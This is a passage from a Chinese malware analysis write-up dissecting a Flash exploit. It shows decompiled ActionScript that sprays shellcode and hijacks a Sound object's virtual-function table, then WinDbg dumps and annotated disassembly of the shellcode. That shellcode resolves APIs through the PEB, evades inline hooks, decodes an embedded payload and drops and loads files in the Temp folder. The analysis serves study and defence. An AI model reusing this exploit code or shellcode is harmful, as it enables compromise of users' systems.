            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 251)] = 23;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 252)] = 1173699;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 253)] = 0x11B80000;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 254)] = 3263169537;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 0xFF)] = 48955404;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 0x0100)] = 4192781144;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 0x0101)] = 1543503871;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 258)] = 2310539206;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 259)] = 3345351007;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 260)] = 3774809415;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 261)] = 3700118467;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 262)] = 1749051987;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 263)] = 0x1000;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 264)] = 742820695;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 265)] = 0xFFFF78E8;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 266)] = 1371756799;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 267)] = 1014336342;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 268)] = 2016310411;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 269)] = 2337731843;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 270)] = 4110622838;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 271)] = 1095354675;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 272)] = 868549549;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 273)] = 280891355;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 274)] = 141874746;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 275)] = 50842561;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 276)] = 4058726618;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 277)] = 3883212603;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 278)] = 610175838;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 279)] = 2338774275;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 280)] = 1586187020;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 281)] = 2346517276;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 282)] = 3305343748;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 283)] = 3277414059;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 284)] = 4294714600;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 285)] = 1111593215;
            this.s[_local7][((((_local3 - _local21) / 4) + _local26) + 286)] = 17475;
            
            
            /*
            // 释放图片(PE文件)代码
            this.jpgByte.endian = Endian.LITTLE_ENDIAN;
            this.jpgByte.position = 0;
            ByteArray(this.loader.data).position = 36321;
            ByteArray(this.loader.data).readBytes(this.jpgByte, 0, 0);
            var _local42:uint = this.jpgByte.length;
            var _local43:int;
            while (((_local43 + 1) * 4) < _local42)
            {
            _local44 = this.jpgByte.readInt();
            try
            {
            this.s[_local7][(((((_local3 - _local21) / 4) + _local26) + 287) + _local43)] = _local44;
            }
            catch(e:Error)
            {
            };
            _local43++;
            };
            */
            
            
            // 修改对象虚函数表指针,改为0x1a1b3100
            _local29 = 0;
            if (_local4 > _local21)
            {
                this.s[_local7][((_local4 - _local21) / 4)] = _local3;
            }
            else
            {
                this.s[_local7][(0x40000000 + ((_local4 - _local21) / 4))] = _local3;
            };
            
            this.m_mark = true;
            
            this.snd.toString();            // Trigger the v-function of Sound object.    No=0x1C  offset=0x70    
            
            // Recover the data that overwrote.
            this.store_bytes.position = 0;
            _local40 = 0;
            while (_local40 < 262144)
            {
                this.s[_local7][(_local40 + _local41)] = this.store_bytes.readInt();
                _local40++;
            };
            
            // Recover the lenght of V2
            this.s[_local2][((0x1000 / 4) - 2)] = this.m_rawLen;
            this.s[_local7][(0x40000000 - ((_local21 - _local16) / 4))] = this.m_rawLen;    // Maybe it is a mistake
        }
        
        public function outInfo(_arg1:String):void
        {
        }
        
        
    }
}//package 
View Code

 

7.4. 第二阶段shellcode分析

技术文章
0:007> dd 1a1b317c 
1a1b317c  1b2024b8 8d20891a 8160e05d 000400ec
1a1b318c  89fc8b00 07c7445f 0c917432 8e0447c7
1a1b319c  c7ac0a13 e2390847 47c7837d d189630c
1a1b31ac  1047c74f 94e43293 501447c7 c7cb9bd5
1a1b31bc  be431847 47c7dbac 0f36b21c 2047c713
1a1b31cc  741f8dc4 512447c7 c701a22f 66572847
1a1b31dc  47c7ff0d 64a41e2c 3047c7ef bbafdf85
1a1b31ec  c23447c7 c7014b19 0fb13847 47c707eb
0:007> dd
1a1b31fc  1553fb3c 4047c766 f8100a98 0003d7e9
1a1b320c  57895a00 64c03350 000030a1 0c408b00
1a1b321c  8b14408b 8b008b00 708b1068 28c68320
1a1b322c  3e80008b 7402756b 4b3e8005 4646e975
1a1b323c  75653e80 80057402 db75453e 3e804646
1a1b324c  74027572 523e8005 4646ed75 756e3e80
1a1b325c  80057402 df754e3e 5756c58b 0200ec81
1a1b326c  f48b0000 de8bc88b f78be88b e8590f6a
0:007> dd
1a1b327c  0000031f ee8bf9e2 32336c68 68736800
1a1b328c  8b546c65 027fe806 e88b0000 e859016a
1a1b329c  000002ff 3368f9e2 68000032 72657375
1a1b32ac  e8068b54 00000261 016ae88b 02e1e859
1a1b32bc  f9e20000 01009e8d 68530000 00000100
1a1b32cc  810856ff 4cfc187c 745c776f c6097502
1a1b32dc  00009986 07eb0100 009986c6 8d000000
1a1b32ec  000200be 0100b900 c0330000 ef81aaf3
0:007> dd
1a1b32fc  00000100 01006857 56ff0000 40c03308
1a1b330c  00073c80 8689f975 00000090 0200be8d
1a1b331c  df8b0000 0090868b f8030000 717307c7
1a1b332c  47c7726c 656e6504 0847c777 7478742e
1a1b333c  006a006a 006a026a 0068026a 53400000
1a1b334c  e810468b 000001c1 ffffff3d a9840f0f
1a1b335c  89000001 00009886 00ec8100 8b000004
1a1b336c  00ec81fc 33000001 507e8bdb 8907c783
0:007> dd
1a1b337c  46c7507e 00040070 831f8b00 c9330cc7
1a1b338c  7c80cb8b 7495ff0f 0f7c800c 057400ff
1a1b339c  ff0f7480 8bebe295 5f8b507e 0cc78304
1a1b33ac  0400fb81 037f0000 6a705e89 74468d00
1a1b33bc  7076ff50 98b6ff57 ff000000 c7812056
1a1b33cc  00000400 0400eb81 fb830000 81d17f00
1a1b33dc  000500c4 98868b00 50000000 e828468b
1a1b33ec  00000125 00be8d90 8b000002 90868bdf
0:007> dd
1a1b33fc  03000000 7307c7f8 c7657274 6d610447
1a1b340c  47c7652e 00657808 006a9000 026a006a
1a1b341c  026a006a 00000068 468b5340 00e7e810
1a1b342c  ff3d0000 0f0fffff 0000cf84 98868900
1a1b343c  81000000 000400ec 81fc8b00 000100ec
1a1b344c  8bdb3300 46c7507e 00040070 04478b00
1a1b345c  83085f8b f8030cc7 0400fb81 037f0000
1a1b346c  6a705e89 74468d00 7076ff50 98b6ff57
0:007> dd
1a1b347c  ff000000 c7812056 00000400 0400eb81
1a1b348c  fb830000 81d17f00 000500c4 98868b00
1a1b349c  50000000 e828468b 0000006d 00be8d90
1a1b34ac  8b000002 90868bdf 03000000 7307c7f8
1a1b34bc  c7726c71 6e650447 47c77765 78742e08
1a1b34cc  8b11eb74 006a243c 02009e8d 8b530000
1a1b34dc  35eb5706 ffffeae8 5721ebff 08247c8b
1a1b34ec  6a006a51 6a036a00 68016a00 80000000
0:007> dd
1a1b34fc  10468b57 000010e8 c35f5900 1b2024b8
1a1b350c  83208b1a 288b04e8 e83880c3 38800a74
1a1b351c  800574e9 1175eb38 90057881 74909090
1a1b352c  55ff8b08 408dec8b e8e0ff05 0000003f
1a1b353c  e83880c3 38800a74 800574e9 1175eb38
1a1b354c  90057881 74909090 0a0868e0 408d0000
1a1b355c  e8e0ff05 00000017 0011e8c3 11b80000
1a1b356c  c2800401 02eb000c f9e8c358 5bffffff
0:007> dd
1a1b357c  89b807c6 c766015f e0ff0547 dc8b53c3
1a1b358c  68406a53 00001000 2c468b57 ffff78e8
1a1b359c  51c358ff 3c758b56 782e748b 8b56f503
1a1b35ac  f5032076 4149c933 33c503ad 10be0fdb
1a1b35bc  0874d63a 0307cbc1 f1eb40da e7751f3b
1a1b35cc  245e8b5e 8b66dd03 5e8b4b0c 8bdd031c
1a1b35dc  c5038b04 c3595eab fffc24e8 424190ff
1a1b35ec  00004443 00000000 00000000 00000000



0:007> u 1a1b317c l 170
1a1b317c b824201b1a      mov     eax,1A1B2024h
1a1b3181 8920            mov     dword ptr [eax],esp
1a1b3183 8d5de0          lea     ebx,[ebp-20h]
1a1b3186 60              pushad
1a1b3187 81ec00040000    sub     esp,400h
1a1b318d 8bfc            mov     edi,esp
1a1b318f 895f44          mov     dword ptr [edi+44h],ebx
1a1b3192 c7073274910c    mov     dword ptr [edi],0C917432h
1a1b3198 c747048e130aac  mov     dword ptr [edi+4],0AC0A138Eh
1a1b319f c7470839e27d83  mov     dword ptr [edi+8],837DE239h
1a1b31a6 c7470c6389d14f  mov     dword ptr [edi+0Ch],4FD18963h
1a1b31ad c747109332e494  mov     dword ptr [edi+10h],94E43293h
1a1b31b4 c7471450d59bcb  mov     dword ptr [edi+14h],0CB9BD550h
1a1b31bb c7471843beacdb  mov     dword ptr [edi+18h],0DBACBE43h
1a1b31c2 c7471cb2360f13  mov     dword ptr [edi+1Ch],130F36B2h
1a1b31c9 c74720c48d1f74  mov     dword ptr [edi+20h],741F8DC4h
1a1b31d0 c74724512fa201  mov     dword ptr [edi+24h],1A22F51h
1a1b31d7 c7472857660dff  mov     dword ptr [edi+28h],0FF0D6657h
1a1b31de c7472c1ea464ef  mov     dword ptr [edi+2Ch],0EF64A41Eh
1a1b31e5 c7473085dfafbb  mov     dword ptr [edi+30h],0BBAFDF85h
1a1b31ec c74734c2194b01  mov     dword ptr [edi+34h],14B19C2h
1a1b31f3 c74738b10feb07  mov     dword ptr [edi+38h],7EB0FB1h
1a1b31fa c7473cfb531566  mov     dword ptr [edi+3Ch],offset MSHTML!CDispRoot::CloseDisplayTree+0xbe (661553fb)
1a1b3201 c74740980a10f8  mov     dword ptr [edi+40h],0F8100A98h
1a1b3208 e9d7030000      jmp     1a1b35e4
1a1b320d 5a              pop     edx                            1a1b35e9 --> edx
1a1b320e 895750          mov     dword ptr [edi+50h],edx
1a1b3211 33c0            xor     eax,eax
1a1b3213 64a130000000    mov     eax,dword ptr fs:[00000030h]    TEB.pPEB (&PEB) --> eax                FS中保存着当前线程TEB的段选择子,TEB偏移30h处为进程PEB
1a1b3219 8b400c          mov     eax,dword ptr [eax+0Ch]        Peb.Ldr (_PEB_LDR_DATA) --> eax
1a1b321c 8b4014          mov     eax,dword ptr [eax+14h]        InMemoryOrderModuleList : _LIST_ENTRY --> eax
1a1b321f 8b00            mov     eax,dword ptr [eax]
1a1b3221 8b00            mov     eax,dword ptr [eax]
1a1b3223 8b6810          mov     ebp,dword ptr [eax+10h]        ------search kernel32.dll BaseAddress------
1a1b3226 8b7020          mov     esi,dword ptr [eax+20h]        C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.k.e.r.n.e.l.3.2...d.l.l.
1a1b3229 83c628          add     esi,28h
1a1b322c 8b00            mov     eax,dword ptr [eax]
1a1b322e 803e6b          cmp     byte ptr [esi],6Bh                compare with k
1a1b3231 7502            jne     1a1b3235
1a1b3233 7405            je      1a1b323a
1a1b3235 803e4b          cmp     byte ptr [esi],4Bh                compare with K
1a1b3238 75e9            jne     1a1b3223                        
1a1b323a 46              inc     esi
1a1b323b 46              inc     esi
1a1b323c 803e65          cmp     byte ptr [esi],65h                e
1a1b323f 7502            jne     1a1b3243
1a1b3241 7405            je      1a1b3248
1a1b3243 803e45          cmp     byte ptr [esi],45h                E
1a1b3246 75db            jne     1a1b3223
1a1b3248 46              inc     esi
1a1b3249 46              inc     esi
1a1b324a 803e72          cmp     byte ptr [esi],72h                r
1a1b324d 7502            jne     1a1b3251
1a1b324f 7405            je      1a1b3256
1a1b3251 803e52          cmp     byte ptr [esi],52h                R
1a1b3254 75ed            jne     1a1b3243
1a1b3256 46              inc     esi
1a1b3257 46              inc     esi
1a1b3258 803e6e          cmp     byte ptr [esi],6Eh                n
1a1b325b 7502            jne     1a1b325f
1a1b325d 7405            je      1a1b3264
1a1b325f 803e4e          cmp     byte ptr [esi],4Eh                N
1a1b3262 75df            jne     1a1b3243                        -------------------------------------------
1a1b3264 8bc5            mov     eax,ebp
1a1b3266 56              push    esi
1a1b3267 57              push    edi
1a1b3268 81ec00020000    sub     esp,200h
1a1b326e 8bf4            mov     esi,esp
1a1b3270 8bc8            mov     ecx,eax
1a1b3272 8bde            mov     ebx,esi
1a1b3274 8be8            mov     ebp,eax
1a1b3276 8bf7            mov     esi,edi
1a1b3278 6a0f            push    0Fh
1a1b327a 59              pop     ecx
1a1b327b e81f030000      call    1a1b359f            // Get kernel32 API:LoadLibraryA、GetFileSize:、GetTempPathA、ExitProcess、CreateFileA、
1a1b3280 e2f9            loop    1a1b327b            // WideCharToMultiByte、SetFilePointer、ReadFile、WriteFile、WinExec、CloseHandle、VirtualProtect
1a1b3282 8bee            mov     ebp,esi            // GetProcAddress、CreateFileMappingA、CopyFileA
1a1b3284 686c333200      push    32336Ch
1a1b3289 687368656c      push    offset IEFRAME!__pobjectentrylast <PERF> (IEFRAME+0xbf6873) (6c656873)
1a1b328e 54              push    esp
1a1b328f 8b06            mov     eax,dword ptr [esi]
1a1b3291 e87f020000      call    1a1b3515                            // Check & Call kernel32!LoadLibraryA(shell32)
1a1b3296 8be8            mov     ebp,eax
1a1b3298 6a01            push    1
1a1b329a 59              pop     ecx
1a1b329b e8ff020000      call    1a1b359f                            // Get shell32!SHGetSpecialFolderPathA
1a1b32a0 e2f9            loop    1a1b329b
1a1b32a2 6833320000      push    3233h
1a1b32a7 6875736572      push    72657375h
1a1b32ac 54              push    esp
1a1b32ad 8b06            mov     eax,dword ptr [esi]
1a1b32af e861020000      call    1a1b3515                            // Check & Call kernel32!LoadLibraryA(user32)
1a1b32b4 8be8            mov     ebp,eax
1a1b32b6 6a01            push    1
1a1b32b8 59              pop     ecx
1a1b32b9 e8e1020000      call    1a1b359f                            // Get user32!MessageBeep
1a1b32be e2f9            loop    1a1b32b9
1a1b32c0 8d9e00010000    lea     ebx,[esi+100h]
1a1b32c6 53              push    ebx
1a1b32c7 6800010000      push    100h
1a1b32cc ff5608          call    dword ptr [esi+8]                    // Call kernel32!GetTempPathA    C:\Users\Win7_x86\AppData\Local\Temp1a1b32cf 817c18fc4c6f775c cmp     dword ptr [eax+ebx-4],5C776F4Ch
1a1b32d7 7402            je      1a1b32db
1a1b32d9 7509            jne     1a1b32e4
1a1b32db c6869900000001  mov     byte ptr [esi+99h],1
1a1b32e2 eb07            jmp     1a1b32eb
1a1b32e4 c6869900000000  mov     byte ptr [esi+99h],0
1a1b32eb 8dbe00020000    lea     edi,[esi+200h]
1a1b32f1 b900010000      mov     ecx,100h
1a1b32f6 33c0            xor     eax,eax
1a1b32f8 f3aa            rep stos byte ptr es:[edi]
1a1b32fa 81ef00010000    sub     edi,100h
1a1b3300 57              push    edi
1a1b3301 6800010000      push    100h
1a1b3306 ff5608          call    dword ptr [esi+8]                    // Call kernel32!GetTempPathA    C:\Users\Win7_x86\AppData\Local\Temp1a1b3309 33c0            xor     eax,eax
1a1b330b 40              inc     eax
1a1b330c 803c0700        cmp     byte ptr [edi+eax],0
1a1b3310 75f9            jne     1a1b330b
1a1b3312 898690000000    mov     dword ptr [esi+90h],eax
1a1b3318 8dbe00020000    lea     edi,[esi+200h]
1a1b331e 8bdf            mov     ebx,edi
1a1b3320 8b8690000000    mov     eax,dword ptr [esi+90h]
1a1b3326 03f8            add     edi,eax
1a1b3328 c70773716c72    mov     dword ptr [edi],726C7173h
1a1b332e c74704656e6577  mov     dword ptr [edi+4],77656E65h
1a1b3335 c747082e747874  mov     dword ptr [edi+8],7478742Eh        // sqlrenew.txt
1a1b333c 6a00            push    0
1a1b333e 6a00            push    0
1a1b3340 6a02            push    2
1a1b3342 6a00            push    0
1a1b3344 6a02            push    2
1a1b3346 6800000040      push    40000000h
1a1b334b 53              push    ebx
1a1b334c 8b4610          mov     eax,dword ptr [esi+10h]
1a1b334f e8c1010000      call    1a1b3515                            // Check & Call kernel32!CreateFileA        C:\Users\Win7_x86\AppData\Local\Temp\sqlrenew.txt
1a1b3354 3dffffff0f      cmp     eax,0FFFFFFFh
1a1b3359 0f84a9010000    je      1a1b3508
1a1b335f 898698000000    mov     dword ptr [esi+98h],eax
1a1b3365 81ec00040000    sub     esp,400h
1a1b336b 8bfc            mov     edi,esp
1a1b336d 81ec00010000    sub     esp,100h
1a1b3373 33db            xor     ebx,ebx
1a1b3375 8b7e50          mov     edi,dword ptr [esi+50h]
1a1b3378 83c707          add     edi,7
1a1b337b 897e50          mov     dword ptr [esi+50h],edi
1a1b337e c7467000040000  mov     dword ptr [esi+70h],400h
1a1b3385 8b1f            mov     ebx,dword ptr [edi]
1a1b3387 83c70c          add     edi,0Ch
1a1b338a 33c9            xor     ecx,ecx
1a1b338c 8bcb            mov     ecx,ebx
1a1b338e 807c0fff95      cmp     byte ptr [edi+ecx-1],95h
1a1b3393 740c            je      1a1b33a1
1a1b3395 807c0fff00      cmp     byte ptr [edi+ecx-1],0
1a1b339a 7405            je      1a1b33a1
1a1b339c 80740fff95      xor     byte ptr [edi+ecx-1],95h
1a1b33a1 e2eb            loop    1a1b338e                            // 将”Erido.jpg”包含的数据解码
1a1b33a3 8b7e50          mov     edi,dword ptr [esi+50h]
1a1b33a6 8b5f04          mov     ebx,dword ptr [edi+4]
1a1b33a9 83c70c          add     edi,0Ch
1a1b33ac 81fb00040000    cmp     ebx,400h
1a1b33b2 7f03            jg      1a1b33b7
1a1b33b4 895e70          mov     dword ptr [esi+70h],ebx
1a1b33b7 6a00            push    0
1a1b33b9 8d4674          lea     eax,[esi+74h]
1a1b33bc 50              push    eax
1a1b33bd ff7670          push    dword ptr [esi+70h]
1a1b33c0 57              push    edi
1a1b33c1 ffb698000000    push    dword ptr [esi+98h]
1a1b33c7 ff5620          call    dword ptr [esi+20h]                // Call kernel32!WriteFile
1a1b33ca 81c700040000    add     edi,400h
1a1b33d0 81eb00040000    sub     ebx,400h
1a1b33d6 83fb00          cmp     ebx,0
1a1b33d9 7fd1            jg      1a1b33ac
1a1b33db 81c400050000    add     esp,500h
1a1b33e1 8b8698000000    mov     eax,dword ptr [esi+98h]
1a1b33e7 50              push    eax
1a1b33e8 8b4628          mov     eax,dword ptr [esi+28h]
1a1b33eb e825010000      call    1a1b3515                            // Check & Call kernel32!CloseHandle
1a1b33f0 90              nop
1a1b33f1 8dbe00020000    lea     edi,[esi+200h]
1a1b33f7 8bdf            mov     ebx,edi
1a1b33f9 8b8690000000    mov     eax,dword ptr [esi+90h]
1a1b33ff 03f8            add     edi,eax
1a1b3401 c70773747265    mov     dword ptr [edi],65727473h
1a1b3407 c74704616d2e65  mov     dword ptr [edi+4],652E6D61h
1a1b340e c7470878650000  mov     dword ptr [edi+8],6578h            // stream.exe
1a1b3415 90              nop
1a1b3416 6a00            push    0
1a1b3418 6a00            push    0
1a1b341a 6a02            push    2
1a1b341c 6a00            push    0
1a1b341e 6a02            push    2
1a1b3420 6800000040      push    40000000h
1a1b3425 53              push    ebx
1a1b3426 8b4610          mov     eax,dword ptr [esi+10h]
1a1b3429 e8e7000000      call    1a1b3515                            // Check & Call kernel32!CreateFileA        C:\Users\Win7_x86\AppData\Local\Temp\stream.exe
1a1b342e 3dffffff0f      cmp     eax,0FFFFFFFh
1a1b3433 0f84cf000000    je      1a1b3508
1a1b3439 898698000000    mov     dword ptr [esi+98h],eax
1a1b343f 81ec00040000    sub     esp,400h
1a1b3445 8bfc            mov     edi,esp
1a1b3447 81ec00010000    sub     esp,100h
1a1b344d 33db            xor     ebx,ebx
1a1b344f 8b7e50          mov     edi,dword ptr [esi+50h]
1a1b3452 c7467000040000  mov     dword ptr [esi+70h],400h
1a1b3459 8b4704          mov     eax,dword ptr [edi+4]
1a1b345c 8b5f08          mov     ebx,dword ptr [edi+8]
1a1b345f 83c70c          add     edi,0Ch
1a1b3462 03f8            add     edi,eax
1a1b3464 81fb00040000    cmp     ebx,400h
1a1b346a 7f03            jg      1a1b346f
1a1b346c 895e70          mov     dword ptr [esi+70h],ebx
1a1b346f 6a00            push    0
1a1b3471 8d4674          lea     eax,[esi+74h]
1a1b3474 50              push    eax
1a1b3475 ff7670          push    dword ptr [esi+70h]
1a1b3478 57              push    edi
1a1b3479 ffb698000000    push    dword ptr [esi+98h]
1a1b347f ff5620          call    dword ptr [esi+20h]                // Call kernel32!WriteFile
1a1b3482 81c700040000    add     edi,400h
1a1b3488 81eb00040000    sub     ebx,400h
1a1b348e 83fb00          cmp     ebx,0
1a1b3491 7fd1            jg      1a1b3464
1a1b3493 81c400050000    add     esp,500h
1a1b3499 8b8698000000    mov     eax,dword ptr [esi+98h]
1a1b349f 50              push    eax
1a1b34a0 8b4628          mov     eax,dword ptr [esi+28h]
1a1b34a3 e86d000000      call    1a1b3515                            // Check & Call kernel32!CloseHandle
1a1b34a8 90              nop
1a1b34a9 8dbe00020000    lea     edi,[esi+200h]
1a1b34af 8bdf            mov     ebx,edi
1a1b34b1 8b8690000000    mov     eax,dword ptr [esi+90h]
1a1b34b7 03f8            add     edi,eax
1a1b34b9 c70773716c72    mov     dword ptr [edi],726C7173h
1a1b34bf c74704656e6577  mov     dword ptr [edi+4],77656E65h
1a1b34c6 c747082e747874  mov     dword ptr [edi+8],7478742Eh        // sqlrenew.txt
1a1b34cd eb11            jmp     1a1b34e0
1a1b34cf 8b3c24          mov     edi,dword ptr [esp]
1a1b34d2 6a00            push    0
1a1b34d4 8d9e00020000    lea     ebx,[esi+200h]
1a1b34da 53              push    ebx
1a1b34db 8b06            mov     eax,dword ptr [esi]
1a1b34dd 57              push    edi
1a1b34de eb35            jmp     1a1b3515                            // Check & Jmp kernel32!LoadLibraryA        C:\Users\Win7_x86\AppData\Local\Temp\sqlrenew.txt
1a1b34e0 e8eaffffff      call    1a1b34cf
1a1b34e5 eb21            jmp     1a1b3508
1a1b34e7 57              push    edi
1a1b34e8 8b7c2408        mov     edi,dword ptr [esp+8]
1a1b34ec 51              push    ecx
1a1b34ed 6a00            push    0
1a1b34ef 6a00            push    0
1a1b34f1 6a03            push    3
1a1b34f3 6a00            push    0
1a1b34f5 6a01            push    1
1a1b34f7 6800000080      push    80000000h
1a1b34fc 57              push    edi
1a1b34fd 8b4610          mov     eax,dword ptr [esi+10h]
1a1b3500 e810000000      call    1a1b3515
1a1b3505 59              pop     ecx
1a1b3506 5f              pop     edi
1a1b3507 c3              ret
1a1b3508 b824201b1a      mov     eax,1A1B2024h
1a1b350d 8b20            mov     esp,dword ptr [eax]
1a1b350f 83e804          sub     eax,4
1a1b3512 8b28            mov     ebp,dword ptr [eax]
1a1b3514 c3              ret
1a1b3515 8038e8          cmp     byte ptr [eax],0E8h                -------------search inline hook----------------
1a1b3518 740a            je      1a1b3524
1a1b351a 8038e9          cmp     byte ptr [eax],0E9h
1a1b351d 7405            je      1a1b3524
1a1b351f 8038eb          cmp     byte ptr [eax],0EBh
1a1b3522 7511            jne     1a1b3535
1a1b3524 81780590909090  cmp     dword ptr [eax+5],90909090h
1a1b352b 7408            je      1a1b3535
1a1b352d 8bff            mov     edi,edi
1a1b352f 55              push    ebp
1a1b3530 8bec            mov     ebp,esp
1a1b3532 8d4005          lea     eax,[eax+5]
1a1b3535 ffe0            jmp     eax                                // call API
1a1b3537 e83f000000      call    1a1b357b
1a1b353c c3              ret                                        -----------------------------
1a1b353d 8038e8          cmp     byte ptr [eax],0E8h
1a1b3540 740a            je      1a1b354c
1a1b3542 8038e9          cmp     byte ptr [eax],0E9h
1a1b3545 7405            je      1a1b354c
1a1b3547 8038eb          cmp     byte ptr [eax],0EBh
1a1b354a 7511            jne     1a1b355d
1a1b354c 81780590909090  cmp     dword ptr [eax+5],90909090h
1a1b3553 74e0            je      1a1b3535
1a1b3555 68080a0000      push    0A08h
1a1b355a 8d4005          lea     eax,[eax+5]
1a1b355d ffe0            jmp     eax
1a1b355f e817000000      call    1a1b357b
1a1b3564 c3              ret
1a1b3565 e811000000      call    1a1b357b
1a1b356a b811010480      mov     eax,80040111h
1a1b356f c20c00          ret     0Ch
1a1b3572 eb02            jmp     1a1b3576
1a1b3574 58              pop     eax
1a1b3575 c3              ret
1a1b3576 e8f9ffffff      call    1a1b3574
1a1b357b 5b              pop     ebx
1a1b357c c607b8          mov     byte ptr [edi],0B8h
1a1b357f 895f01          mov     dword ptr [edi+1],ebx
1a1b3582 66c74705ffe0    mov     word ptr [edi+5],0E0FFh
1a1b3588 c3              ret
1a1b3589 53              push    ebx
1a1b358a 8bdc            mov     ebx,esp
1a1b358c 53              push    ebx
1a1b358d 6a40            push    40h
1a1b358f 6800100000      push    1000h
1a1b3594 57              push    edi
1a1b3595 8b462c          mov     eax,dword ptr [esi+2Ch]
1a1b3598 e878ffffff      call    1a1b3515
1a1b359d 58              pop     eax
1a1b359e c3              ret
1a1b359f 51              push    ecx                                    ------------search kerner32!API---------------------
1a1b35a0 56              push    esi
1a1b35a1 8b753c          mov     esi,dword ptr [ebp+3Ch]
1a1b35a4 8b742e78        mov     esi,dword ptr [esi+ebp+78h]
1a1b35a8 03f5            add     esi,ebp
1a1b35aa 56              push    esi
1a1b35ab 8b7620          mov     esi,dword ptr [esi+20h]
1a1b35ae 03f5            add     esi,ebp
1a1b35b0 33c9            xor     ecx,ecx
1a1b35b2 49              dec     ecx
1a1b35b3 41              inc     ecx
1a1b35b4 ad              lods    dword ptr [esi]
1a1b35b5 03c5            add     eax,ebp
1a1b35b7 33db            xor     ebx,ebx
1a1b35b9 0fbe10          movsx   edx,byte ptr [eax]
1a1b35bc 3ad6            cmp     dl,dh
1a1b35be 7408            je      1a1b35c8
1a1b35c0 c1cb07          ror     ebx,7
1a1b35c3 03da            add     ebx,edx
1a1b35c5 40              inc     eax
1a1b35c6 ebf1            jmp     1a1b35b9
1a1b35c8 3b1f            cmp     ebx,dword ptr [edi]
1a1b35ca 75e7            jne     1a1b35b3
1a1b35cc 5e              pop     esi
1a1b35cd 8b5e24          mov     ebx,dword ptr [esi+24h]
1a1b35d0 03dd            add     ebx,ebp
1a1b35d2 668b0c4b        mov     cx,word ptr [ebx+ecx*2]
1a1b35d6 8b5e1c          mov     ebx,dword ptr [esi+1Ch]
1a1b35d9 03dd            add     ebx,ebp
1a1b35db 8b048b          mov     eax,dword ptr [ebx+ecx*4]
1a1b35de 03c5            add     eax,ebp
1a1b35e0 ab              stos    dword ptr es:[edi]
1a1b35e1 5e              pop     esi
1a1b35e2 59              pop     ecx
1a1b35e3 c3              ret                                            ---------------------------------
1a1b35e4 e824fcffff      call    1a1b320d
1a1b35e9 90              nop
1a1b35ea 41              inc     ecx
1a1b35eb 42              inc     edx
1a1b35ec 43              inc     ebx
1a1b35ed 44              inc     esp


********************************************************

Breakpoint 1 hit
eax=00000000 ebx=0254b810 ecx=1a1b3100 edx=1a1b35e9 esi=06602020 edi=0254b3e4
eip=1a1b3213 esp=0254b3e4 ebp=0254b830 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
1a1b3213 64a130000000    mov     eax,dword ptr fs:[00000030h] fs:003b:00000030=7ffdb000

//查看fs"段寄存器"所保存的"段选择子"在GDT中对应的"段描述符"信息,线程的TEB保存在此段描述符所指示的基地址处(FS段寄存器用来索引线程的TEB)
0:007> dg 3b
                                  P Si Gr Pr Lo
Sel    Base     Limit     Type    l ze an es ng Flags
---- -------- -------- ---------- - -- -- -- -- --------
003B 7ffd7000 00000fff Data RW Ac 3 Bg By P  Nl 000004f3

//查看TEB
0:007> dt _TEB 7ffd7000 
ntdll!_TEB
   +0x000 NtTib            : _NT_TIB
   +0x01c EnvironmentPointer : (null) 
   +0x020 ClientId         : _CLIENT_ID
   +0x028 ActiveRpcHandle  : (null) 
   +0x02c ThreadLocalStoragePointer : 0x003fd870 Void
   +0x030 ProcessEnvironmentBlock : 0x7ffdb000 _PEB                // PEB
   +0x034 LastErrorValue   : 0
   +0x038 CountOfOwnedCriticalSections : 0
   +0x03c CsrClientThread  : (null) 
   +0x040 Win32ThreadInfo  : 0xfe7d3dd8 Void
   +0x044 User32Reserved   : [26] 0
   +0x0ac UserReserved     : [5] 0
   +0x0c0 WOW32Reserved    : (null) 
   +0x0c4 CurrentLocale    : 0x804
   +0x0c8 FpSoftwareStatusRegister : 0
   +0x0cc SystemReserved1  : [54] (null) 
   +0x1a4 ExceptionCode    : 0n0
   +0x1a8 ActivationContextStackPointer : 0x003f5ac0 _ACTIVATION_CONTEXT_STACK
   +0x1ac SpareBytes       : [36]  ""
   +0x1d0 TxFsContext      : 0xfffe
   +0x1d4 GdiTebBatch      : _GDI_TEB_BATCH
   +0x6b4 RealClientId     : _CLIENT_ID
   +0x6bc GdiCachedProcessHandle : (null) 
   +0x6c0 GdiClientPID     : 0
   +0x6c4 GdiClientTID     : 0
   +0x6c8 GdiThreadLocalInfo : (null) 
